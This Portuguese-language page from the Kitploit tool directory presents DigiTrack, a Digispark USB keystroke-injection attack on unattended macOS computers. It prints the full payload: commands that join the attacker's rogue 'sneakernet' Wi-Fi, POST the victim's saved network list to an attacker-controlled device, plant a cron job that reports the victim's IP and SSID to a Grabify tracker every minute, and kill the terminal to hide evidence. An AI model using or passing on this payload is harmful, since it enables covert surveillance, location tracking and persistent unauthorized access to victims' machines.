Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DigiTrack — Ataques por $5 ou menos usando Arduino | Kitploit
Ferramentas/GitHubGitHub/skickar/digitrack
Auditoria de Wi-FiMecanismos de PersistênciaColeta de InformaçõesHacking de HardwareRed Teaming
GitHubskickar/digitrack

DigiTrack

Ataques por $5 ou menos usando Arduino

Ver Repositório
8115há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DigiTrack

Em 30 segundos, este ataque pode descobrir a que redes um computador MacOS se conectou anteriormente e plantar um script que rastreia o endereço IP atual e a rede Wi-Fi a cada 60 segundos.

alt text

Agora inclui: Hardtracker - Digispark VPN buster para enviar o endereço IP e BSSID/SSID de redes Wi-Fi próximas em um computador MacOS para um rastreador Grabify a cada 60 segundos.

Este é um ataque de $5 que faz algumas coisas:

  1. Insere um backdoor Wi-Fi em um computador da vítima, permitindo que você capture a conexão de dados da vítima a qualquer momento quando estiver no alcance do Wi-Fi.
  2. Rouba uma lista de todas as redes às quais a vítima já se conectou (para rastreamento, classificação e sequestro de conexão de dados).
  3. Insere um trabalho de rastreamento que envia o endereço IP e a rede conectada atualmente para um link Grabify a cada 60 segundos.

O ataque ocorre: Uma vítima deixa um computador MacOS desacompanhado por 30 segundos. O atacante insere uma placa DigiSpark carregada com um payload de ataque. O payload se parece com isto (com atrasos e teclas individuais removidos):

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");

  • Adicionamos a rede "Sneakernet" à nossa lista de redes confiáveis e nos conectamos a ela.

DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type: text/plain" --data "$(networksetup -listpreferredwirelessnetworks en0)" 192.168.4.1 &");

  • Após conectar, enviamos uma requisição CURL listando cada rede que o computador MacOS já conectou para o esp8266 criando a rede "Sneakernet". O & coloca o processo em segundo plano caso demore muito, e o -m define um temporizador de 10 segundos para evitar que demore demais. Agora sabemos a quais redes Wi-Fi a vítima se conectou e quais redes forçarão o computador a conectar sem perguntar.

DigiKeyboard.print("export VISUAL=nano; crontab -e");

  • Criamos um trabalho que será executado a cada 60 segundos.

DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://grabi/YOURLINK");

  • Suprimimos a saída do CURL e capturamos o nome da rede Wi-Fi atualmente conectada. Enviamos isso junto com uma requisição CURL para uma URL de rastreamento, entregando o endereço IP do alvo e a rede Wi-Fi atualmente conectada a cada 60 segundos.

DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");

  • Finalmente, esperamos todos os processos em segundo plano terminarem e matamos a janela do terminal para esconder as evidências.

O tempo total de execução é de cerca de 30 segundos, não incluindo os poucos segundos que o Digispark espera para o upload de um sketch.

Notas: O Grabify pode entrar no modo "Estou sob ataque" e não permitir o check-in. Procure por esta linha: div class="cf-browser-verification cf-im-under-attack"

Se você vê-la, então o endereço IP está sendo bloqueado pelo Cloudflare.

Baixar ferramenta